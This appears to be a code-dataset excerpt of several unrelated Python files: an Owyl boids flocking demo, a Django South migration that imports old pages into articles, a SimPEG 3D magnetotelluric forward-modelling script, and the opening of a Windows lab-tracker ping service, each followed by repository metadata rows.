- L{Boid.steerForCohesion}: steer toward average position of neighbors.
Helpers
=======
A number of other helper methods clutter up the namespace. Boid also
inherits from L{steering.Steerable<examples.steering.Steerable>},
which contains common steering helper methods which will be useful in
future examples.
Other Stuff
===========
Copyright 2008 David Eyk. All rights reserved.
$Author$\n
$Rev$\n
$Date$
@newfield blackboard: Blackboard data
"""
__author__ = "$Author$"[9:-2]
__revision__ = "$Rev$"[6:-2]
__date__ = "$Date$"[7:-2]
import os
import random
from math import radians, degrees, sin, cos, pi, atan2
pi_2 = pi*2.0
pi_1_2 = pi/2.0
pi_1_4 = pi/4.0
pi_3_4 = (pi*3)/4
### Optimized attribute getters for sprites..
from operator import attrgetter
getX = attrgetter('x')
getY = attrgetter('y')
getR = attrgetter('rotation')
### Memojito provides memoization (caching) services.
import memojito
### Pyglet provides graphics and resource management.
import pyglet
pyglet.resource.path = [os.path.dirname(os.path.abspath(__file__)),]
pyglet.resource.reindex()
## Cocos provides scene direction and composition
from cocos.director import director
from cocos.scene import Scene
from cocos.actions import FadeIn
from cocos.layer import ScrollableLayer, ScrollingManager
## Rabbyt provides collision detection
from rabbyt.collisions import collide_single
## Owyl provides the wisdom
from owyl import blackboard
import owyl
from steering import Steerable
class Boid(Steerable):
"""Implement a member of a flock.
Boid implements its leaf node behaviors as methods, using the
L{owyl.taskmethod} decorator. Leaf node behaviors may also be
implemented as unbound functions using the L{owyl.task}
decorators.
The boid's behavior tree is built in the L{Boid.buildTree} method,
below.
"""
_img = pyglet.resource.image('triangle_yellow.png')
_img.anchor_x = _img.width / 2
_img.anchor_y = _img.height / 2
boids = []
def __init__(self, blackboard):
super(Boid, self).__init__(self._img)
self.scale = 0.05
self.schedule(self.update)
self.bb = blackboard
self.boids.append(self)
self.opacity = 0
self.do(FadeIn(2))
self.speed = 200
self.bounding_radius = 5
self.bounding_radius_squared = 25
self.neighborhood_radius = 1000
self.personal_radius = 20
self.tree = self.buildTree()
def buildTree(self):
"""Build the behavior tree.
Building the behavior tree is as simple as nesting the
behavior constructor calls.
Building the Behavior Tree
==========================
We'll use a L{parallel<owyl.core.parallel>} parent node as
the root of our tree. Parallel is essentially a round-robin
scheduler. That is, it will run one step on each its children
sequentially, so that the children execute parallel to each
other. Parallel is useful as a root behavior when we want
multiple behaviors to run at the same time, as with Boids.
The first call to a task node constructor returns another
function. Calling I{that} function will return an iterable
generator. (This behavior is provided by the "@task..."
family of python decorators found in L{owyl.core}.)
Generally, you won't have to worry about this unless you're
writing new parent nodes, but keep it in mind.
Also note that keyword arguments can be provided at
construction time (call to task constructor) or at run-time
(call to visit). The C{blackboard} keyword argument to
C{visit} will be available to the entire tree. (This is also
why all nodes should accept C{**kwargs}-style keyword
arguments, and access.
Skipping down to the end of the tree definition, we see the
first use of
L{visit<owyl.core.visit>}. L{visit<owyl.core.visit>} provides
the external iterator interface to the tree. Technically,
it's an implementation of the Visitor pattern. It visits each
"node" of the behavior tree and iterates over it, descending
into children as determined by the logic of the parent
nodes. (In AI terminology, this is a depth-first search, but
with the search logic embedded in the tree.)
L{visit<owyl.core.visit>} is also used internally by several
parent behaviors, including L{parallel<owyl.core.parallel>},
L{limit<owyl.decorators.limit>}, and
L{repeatAlways<owyl.decorators.repeatAlways>} in order to
gain more control over its children.
L{limit<owyl.decorators.limit>}
===============================
The next parent node we see is
L{limit<owyl.decorators.limit>}. L{limit<owyl.decorators.limit>}
is a decorator node designed to limit how often its child is
run (given by the keyword argument C{limit_period} in
seconds). This is useful for limiting the execution of
expensive tasks.
In the example below, we're using
L{limit<owyl.decorators.limit>} to clear memoes once every
0.4 seconds. This implementation of Boids uses
L{memojito<examples.memojito>} to cache (or "memoize")
neighbor data for each Boid. Neighbor data is used by each of
the core behaviors, and is fairly expensive to
calculate. However, it's constantly changing, so adjusting
the limit_period will affect the behavior of the flock (and
the frame rate).
L{repeatAlways<owyl.decorators.repeatAlways>}
=============================================
We next see the L{repeatAlways<owyl.decorators.repeatAlways>}
decorator node. This does exactly as you might expect: it
takes a behavior that might only run once, and repeats it
perpetually, ignoring return values and always yielding None
(the special code for "I'm not done yet, give me another
chance to run").
L{sequence<owyl.decorators.sequence>}
=============================================
Runs a sequence of actions. If any action yields False,
then the rest of the sequence is not executed (the sequence
is halted). Otherwise, the next sequence item is run. In
this example, a boid accelerates away only if it is too close
to another boid.
Core Behaviors
==============
The core behaviors are documented below in each method's
docstring. They are:
- L{Boid.hasCloseNeighbors}: conditional to detect crowding
- L{Boid.accelerate}: accelerate at a given rate
- L{Boid.matchSpeed}: accelerate to match a given speed
- L{Boid.move}: move straight ahead at current speed
- L{Boid.seek}: seek a fixed goal position
- L{Boid.steerToMatchHeading}: match neighbors' average
heading
- L{Boid.steerForSeparation}: steer away from close
flockmates
- L{Boid.steerForCohesion}: steer toward average position of
neighbors.
"""
tree = owyl.parallel(
owyl.limit(
owyl.repeatAlways(self.clearMemoes(), debug=True),
limit_period=0.4),
### Velocity and Acceleration
#############################
owyl.repeatAlways(owyl.sequence(self.hasCloseNeighbors(),
self.accelerate(rate=-.01),
),
),
self.move(),
self.matchSpeed(match_speed=300, rate=.01),
### Steering
############
self.seek(goal=(0, 0), rate=5),
self.steerToMatchHeading(rate=2),
self.steerForSeparation(rate=5),
self.steerForCohesion(rate=2),
policy=owyl.PARALLEL_SUCCESS.REQUIRE_ALL
)
return owyl.visit(tree, blackboard=self.bb)
@owyl.taskmethod
def hasCloseNeighbors(self, **kwargs):
"""Check to see if we have close neighbors.
"""
yield bool(self.closest_neighbors)
@owyl.taskmethod
def accelerate(self, **kwargs):
"""accelerate
@keyword rate: The rate of acceleration (+ or -)
"""
bb = kwargs['blackboard']
rate = kwargs['rate']
dt = bb['dt']
self.speed = max(self.speed + rate * dt, 0)
yield True
@owyl.taskmethod
def matchSpeed(self, **kwargs):
"""Accelerate to match the given speed.
@keyword blackboard: A shared blackboard.
@keyword match_speed: The speed to match.
@keyword rate: The rate of acceleration.
"""
bb = kwargs['blackboard']
ms = kwargs['match_speed']
rate = kwargs['rate']
while True:
if self.speed == ms:
yield None
dt = bb['dt']
dv_size = ms - self.speed
dv = dv_size * rate * dt
self.speed += dv
yield None
@owyl.taskmethod
def move(self, **kwargs):
"""Move the actor forward perpetually.
@keyword blackboard: shared blackboard
@blackboard: B{dt}: time elapsed since last update.
"""
bb = kwargs['blackboard']
while True:
dt = bb['dt']
r = radians(getR(self)) # rotation
s = dt * self.speed
self.x += sin(r) * s
self.y += cos(r) * s
yield None
@owyl.taskmethod
def seek(self, **kwargs):
"""Perpetually seek a goal position.
@keyword rate: steering rate
@keyword blackboard: shared blackboard
@blackboard: B{dt}: time elapsed since last update.
"""
bb = kwargs['blackboard']
rate = kwargs['rate']
gx, gy = kwargs.get('goal', (0, 0))
while True:
dt = bb['dt']
dx = gx-self.x
dy = gy-self.y
seek_heading = self.getFacing(dx, dy)
my_heading = radians(self.rotation)
rsize = degrees(self.findRotationDelta(my_heading, seek_heading))
rchange = rsize * rate * dt
self.rotation += rchange
yield None
@owyl.taskmethod
def steerToMatchHeading(self, **kwargs):
"""Perpetually steer to match actor's heading to neighbors.
@keyword blackboard: shared blackboard
@keyword rate: steering rate
@blackboard: B{dt}: time elapsed since last update.
"""
bb = kwargs['blackboard']
rate = kwargs['rate']
while True:
dt = bb['dt'] or 0.01
n_heading = radians(self.findAverageHeading(*self.neighbors))
if n_heading is None:
yield None
continue
my_heading = radians(self.rotation)
rsize = degrees(self.findRotationDelta(my_heading, n_heading))
# Factor in our turning rate and elapsed time.
rchange = rsize * rate * dt
self.rotation += rchange
yield None
@owyl.taskmethod
def steerForSeparation(self, **kwargs):
"""Steer to maintain distance between self and neighbors.
@keyword blackboard: shared blackboard
@keyword rate: steering rate
@blackboard: B{dt}: time elapsed since last update.
"""
bb = kwargs['blackboard']
rate = kwargs['rate']
while True:
cn_x, cn_y = self.findAveragePosition(*self.closest_neighbors)
dt = bb['dt']
dx = self.x-cn_x
dy = self.y-cn_y
heading_away_from_neighbors = self.getFacing(dx, dy)
flee_heading = heading_away_from_neighbors
my_heading = radians(self.rotation)
rsize = degrees(self.findRotationDelta(my_heading, flee_heading))
# Factor in our turning rate and elapsed time.
rchange = rsize * rate * dt
self.rotation += rchange
yield None
@owyl.taskmethod
def steerForCohesion(self, **kwargs):
"""Steer toward the average position of neighbors.
@keyword blackboard: shared blackboard
@keyword rate: steering rate
@blackboard: B{dt}: time elapsed since last update.
"""
bb = kwargs['blackboard']
rate = kwargs['rate']
while True:
neighbors = self.neighbors
np_x, np_y = self.findAveragePosition(*neighbors)
dt = bb['dt']
dx = np_x-self.x
dy = np_y-self.y
seek_heading = self.getFacing(dx, dy)
my_heading = radians(self.rotation)
# Find the rotation delta
rsize = degrees(self.findRotationDelta(my_heading, seek_heading))
# Factor in our turning rate and elapsed time.
rchange = rsize * rate * dt
self.rotation += rchange
yield None
def canSee(self, other):
"""Return True if I can see the other boid.
@param other: Another Boid or Sprite.
@type other: L{Boid} or C{Sprite}.
"""
dx = self.x - other.x
dy = self.y - other.y
return abs(self.getFacing(dx, dy)) < pi_1_2
@memojito.memoizedproperty
def others(self):
"""Find other boids that I can see.
@rtype: C{list} of L{Boid}s.
"""
return [b for b in self.boids if b is not self and self.canSee(b)]
@property
def neighbors(self):
"""Find the other boids in my neighborhood.
@rtype: C{list} of L{Boid}s.
"""
hood = (self.x, self.y, self.neighborhood_radius) # neighborhood
n = collide_single(hood, self.others)
return n
@property
def closest_neighbors(self):
"""Find the average position of the closest neighbors.
@rtype: C{tuple} of C{(x, y)}.
"""
hood = (self.x, self.y, self.personal_radius)
n = collide_single(hood, self.others)
return n
def findAveragePosition(self, *boids):
"""Return the average position of the given boids.
@rtype: C{tuple} of C{(x, y)}.
"""
if not boids:
return (0, 0)
num_n = float(len(boids)) or 1
avg_x = sum((getX(n) for n in boids))/num_n
avg_y = sum((getY(n) for n in boids))/num_n
return avg_x, avg_y
def findAverageHeading(self, *boids):
"""Return the average heading of the given boids.
@rtype: C{float} rotation in degrees.
"""
if not boids:
return 0.0
return sum((getR(b) for b in boids))/len(boids)
@owyl.taskmethod
def clearMemoes(self, **kwargs):
"""Clear memoizations.
"""
self.clear()
yield True
@memojito.clearbefore
def clear(self):
"""Clear memoizations.
"""
pass
def update(self, dt):
"""Update this Boid's behavior tree.
This gets scheduled in L{Boid.__init__}.
@param dt: Change in time since last update.
@type dt: C{float} seconds.
"""
self.bb['dt'] = dt
self.tree.next()
class BoidLayer(ScrollableLayer):
"""Where the boids fly.
"""
is_event_handler = True
def __init__(self, how_many):
super(BoidLayer, self).__init__()
self.how_many = how_many
self.manager = ScrollingManager()
self.manager.add(self)
self.active = None
self.blackboard = blackboard.Blackboard("boids")
self.boids = None
def makeBoids(self):
boids = []
for x in xrange(int(self.how_many)):
boid = Boid(self.blackboard)
boid.position = (random.randint(0, 200),
random.randint(0, 200))
boid.rotation = random.randint(1, 360)
self.add(boid)
boids.append(boid)
return boids
def on_enter(self):
"""Code to run when the Layer enters the scene.
"""
super(BoidLayer, self).on_enter()
self.boids = self.makeBoids()
# Place flock in the center of the window
self.manager.set_focus(-512, -384)
if __name__ == "__main__":
import sys
if len(sys.argv) == 2:
how_many = int(sys.argv[1])
else:
how_many = 50
director.init(resizable=True, caption="Owyl Behavior Tree Demo: Boids",
width=1024, height=768)
s = Scene(BoidLayer(how_many))
director.run(s)
| bsd-3-clause | -5,427,581,079,136,333,000 | 30.675325 | 77 | 0.604141 | false | 3.850799 | false | false | false |
urlist/devcharm | articles/migrations/0002_import_previous_articles.py | 1 | 18116 | # -*- coding: utf-8 -*-
from django.db.utils import IntegrityError, ProgrammingError
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models, connection
from articles.models import Article
class Migration(DataMigration):
def get_full_raw_content(self, page):
return u'# {}\n\n> {}\n\n{}\n\n{}'.format(page.title, page.punchline, page.description, page.raw_content)
def forwards(self, orm):
if not 'pages_page' in connection.introspection.table_names():
# The table does not exists, which means that we're running on a fresh installation, so we can skip
# the whole migration
return
for page in orm['pages.page'].objects.exclude(author__user_id=308):
defaults = {'created_at': page.created_at,
'deleted_at': page.deleted_at,
'hide': page.hide,
'is_wiki': page.is_wiki,
'published_at': page.published_at,
'raw_content': self.get_full_raw_content(page),
'slug': page.slug.lower(),
'submitted_at': page.submitted_at,
'title': page.title,
'updated_at': page.updated_at,
'views_count': page.views,
'received_kudos_count': page.karma,
'revisions_count': page.pagerevision_set.count(),
# Special treatment required
'author_id': page.author.user_id, }
rendered_content = Article.process_raw_content(defaults['raw_content'])
defaults['rendered_html'] = rendered_content['rendered_html']
defaults['description'] = rendered_content['description']
defaults['punchline'] = rendered_content['punchline']
a, created = orm['articles.article'].objects.get_or_create(pk=page.pk, defaults=defaults)
a.tags.clear()
for tag in page.tags.all():
apply_tag, tag_created = orm['tags.tag'].objects.get_or_create(pk=tag.pk,
defaults={'title': tag.name})
a.tags.add(apply_tag)
a.revision_set.all().delete()
for rev in page.pagerevision_set.all():
rev_values = {
'author': rev.author.user,
'created_at': rev.created_at,
'raw_content': self.get_full_raw_content(rev),
'title': rev.title,
}
rendered_content = Article.process_raw_content(defaults['raw_content'])
rev_values['description'] = rendered_content['description']
rev_values['punchline'] = rendered_content['punchline']
a.revision_set.create(pk=rev.pk, **rev_values)
a.kudos_received.all().delete()
for kudos in page.pagekarma_set.all():
kudos_values = {
'user': kudos.user,
'session_id': kudos.session_id,
'timestamp': kudos.timestamp,
}
a.kudos_received.create(**kudos_values)
a.articleview_set.all().delete()
for v in page.pageview_set.all():
view_values = {
'user': v.user,
'session_id': v.session_id,
'timestamp': v.timestamp,
}
a.articleview_set.create(**view_values)
def backwards(self, orm):
pass
models = {
u'articles.article': {
'Meta': {'object_name': 'Article'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'comments_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'editors_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'hide': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'published_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'punchline': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'raw_content': ('django.db.models.fields.TextField', [], {}),
'received_kudos_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'rendered_html': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'revisions_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'submitted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [],
{'blank': 'True', 'related_name': "'tagged_article_set'", 'null': 'True', 'symmetrical': 'False',
'to': u"orm['tags.Tag']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'views_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
u'articles.articlegroup': {
'Meta': {'object_name': 'ArticleGroup'},
'articles': ('django.db.models.fields.related.ManyToManyField', [],
{'symmetrical': 'False', 'to': u"orm['articles.Article']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'publish_start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'target_block': (
'django.db.models.fields.CharField', [], {'default': "'editors_picks'", 'max_length': '255'})
},
u'articles.articleview': {
'Meta': {'object_name': 'ArticleView'},
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['articles.Article']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'session_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [],
{'blank': 'True', 'related_name': "'viewed_pages'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'articles.kudos': {
'Meta': {'unique_together': "[('article', 'session_id'), ('article', 'user')]", 'object_name': 'Kudos'},
'article': ('django.db.models.fields.related.ForeignKey', [],
{'related_name': "'kudos_received'", 'to': u"orm['articles.Article']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'session_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [],
{'blank': 'True', 'related_name': "'kudos_given'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'articles.revision': {
'Meta': {'ordering': "['-pk']", 'object_name': 'Revision'},
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['articles.Article']"}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'punchline': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'raw_content': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [],
{'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')",
'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': (
'django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [],
{'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True',
'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [],
{'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True',
'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)",
'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'tags.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tag_type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'title': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
u'pages.page': {
'Meta': {'object_name': 'Page'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pages.PageAuthor']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'hide': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_wiki': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'karma': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'published_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'punchline': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'raw_content': ('django.db.models.fields.TextField', [], {}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}),
'submitted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [],
{'symmetrical': 'False', 'to': u"orm['pages.PageTag']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'views': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
u'pages.pageauthor': {
'Meta': {'object_name': 'PageAuthor'},
'bio': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'can_publish': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'karma': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'user': (
'django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.User']", 'unique': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'blank': 'True'})
},
u'pages.pagetag': {
'Meta': {'object_name': 'PageTag'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'pages.pageview': {
'Meta': {'ordering': "['-timestamp']", 'object_name': 'PageView'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pages.Page']"}),
'session_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True'})
},
u'pages.pagekarma': {
'Meta': {'ordering': "['-timestamp']", 'object_name': 'PageKarma'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pages.Page']"}),
'session_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True'})
},
u'pages.pagerevision': {
'Meta': {'object_name': 'PageRevision'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pages.PageAuthor']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['pages.Page']"}),
'punchline': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'raw_content': ('django.db.models.fields.TextField', [], {}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
}
complete_apps = ['articles']
symmetrical = True
| gpl-3.0 | -6,591,887,817,401,861,000 | 66.345725 | 120 | 0.525834 | false | 3.834074 | false | false | false |
simpeg/simpeg | examples/08-nsem/plot_foward_MTTipper3D.py | 1 | 3807 | """
MT: 3D: Forward
===============
Forward model 3D MT data.
Test script to use SimPEG.NSEM platform to forward model
impedance and tipper synthetic data.
"""
import SimPEG as simpeg
from SimPEG.EM import NSEM
import numpy as np
import matplotlib.pyplot as plt
try:
from pymatsolver import Pardiso as Solver
except:
from SimPEG import Solver
def run(plotIt=True):
"""
MT: 3D: Forward
===============
Forward model 3D MT data.
"""
# Make a mesh
M = simpeg.Mesh.TensorMesh(
[
[(100, 9, -1.5), (100., 13), (100, 9, 1.5)],
[(100, 9, -1.5), (100., 13), (100, 9, 1.5)],
[(50, 10, -1.6), (50., 10), (50, 6, 2)]
], x0=['C', 'C', -14926.8217]
)
# Setup the model
conds = [1,1e-2]
sig = simpeg.Utils.ModelBuilder.defineBlock(
M.gridCC, [-100, -100, -350], [100, 100, -150], conds
)
sig[M.gridCC[:, 2] > 0] = 1e-8
sig[M.gridCC[:, 2] < -1000] = 1e-1
sigBG = np.zeros(M.nC) + conds[1]
sigBG[M.gridCC[:, 2] > 0] = 1e-8
if plotIt:
collect_obj, line_obj = M.plotSlice(np.log10(sig), grid=True, normal='X')
color_bar = plt.colorbar(collect_obj)
# Setup the the survey object
# Receiver locations
rx_x, rx_y = np.meshgrid(np.arange(-600, 601, 100), np.arange(-600, 601, 100))
rx_loc = np.hstack((simpeg.Utils.mkvc(rx_x, 2), simpeg.Utils.mkvc(rx_y, 2), np.zeros((np.prod(rx_x.shape), 1))))
# Make a receiver list
rxList = []
for rx_orientation in ['xx', 'xy', 'yx', 'yy']:
rxList.append(NSEM.Rx.Point_impedance3D(rx_loc, rx_orientation, 'real'))
rxList.append(NSEM.Rx.Point_impedance3D(rx_loc, rx_orientation, 'imag'))
for rx_orientation in ['zx', 'zy']:
rxList.append(NSEM.Rx.Point_tipper3D(rx_loc, rx_orientation, 'real'))
rxList.append(NSEM.Rx.Point_tipper3D(rx_loc, rx_orientation, 'imag'))
# Source list
srcList = [
NSEM.Src.Planewave_xy_1Dprimary(rxList, freq)
for freq in np.logspace(4, -2, 13)
]
# Survey MT
survey = NSEM.Survey(srcList)
# Setup the problem object
problem = NSEM.Problem3D_ePrimSec(M, sigma=sig, sigmaPrimary=sigBG)
problem.pair(survey)
problem.Solver = Solver
# Calculate the data
fields = problem.fields()
dataVec = survey.eval(fields)
# Add uncertainty to the data - 10% standard
# devation and 0 floor
dataVec.standard_deviation.fromvec(
np.ones_like(simpeg.mkvc(dataVec)) * 0.1
)
dataVec.floor.fromvec(
np.zeros_like(simpeg.mkvc(dataVec))
)
# Add plots
if plotIt:
# Plot the data
# On and off diagonal (on left and right axis, respectively)
fig, axes = plt.subplots(2, 1, figsize=(7, 5))
plt.subplots_adjust(right=0.8)
[(ax.invert_xaxis(), ax.set_xscale('log')) for ax in axes]
ax_r, ax_p = axes
ax_r.set_yscale('log')
ax_r.set_ylabel('Apparent resistivity [xy-yx]')
ax_r_on = ax_r.twinx()
ax_r_on.set_yscale('log')
ax_r_on.set_ylabel('Apparent resistivity [xx-yy]')
ax_p.set_ylabel('Apparent phase')
ax_p.set_xlabel('Frequency [Hz]')
# Start plotting
ax_r = dataVec.plot_app_res(
np.array([-200, 0]),
components=['xy', 'yx'], ax=ax_r, errorbars=True)
ax_r_on = dataVec.plot_app_res(
np.array([-200, 0]),
components=['xx', 'yy'], ax=ax_r_on, errorbars=True)
ax_p = dataVec.plot_app_phs(
np.array([-200, 0]),
components=['xx', 'xy', 'yx', 'yy'], ax=ax_p, errorbars=True)
ax_p.legend(bbox_to_anchor=(1.05, 1), loc=2)
if __name__ == '__main__':
do_plots = True
run(do_plots)
if do_plots:
plt.show()
| mit | -775,327,344,103,404,200 | 28.511628 | 116 | 0.566851 | false | 2.90389 | false | false | false |
abztrakt/labtracker | client_scripts/ping_service.py | 1 | 2296 | #
# A ping service to be 'compiled' into an exe-file with py2exe.
# To install this service, run 'LabtrackerPingService.py install' at command prompt
# 'Then LabtrackerPingService.py start'
#
#
#Need to download pywin32 in order to import these module
import win32serviceutil
import win32service
import win32event
import win32evtlogutil
import win32api
import win32con
import time
import sys,os
import urllib2
import urllib
import getpass
import servicemanager
DEBUG = True
LABTRACKER_URL = "labtracker.eplt.washington.edu"
if DEBUG:
LABTRACKER_URL = "web16.eplt.washington.edu:8000"
def get_mac():
# windows
if sys.platform == 'win32':
for line in os.popen("ipconfig /all"):
if line.lstrip().startswith('Physical Address'):
mac = line.split(':')[1].strip().replace('-',':')
break
return mac
def get_data(status):
# get user info from machine
user = getpass.getuser()
data = urllib.urlencode({'user': user, 'status': status})
return data
class MyService(win32serviceutil.ServiceFramework):
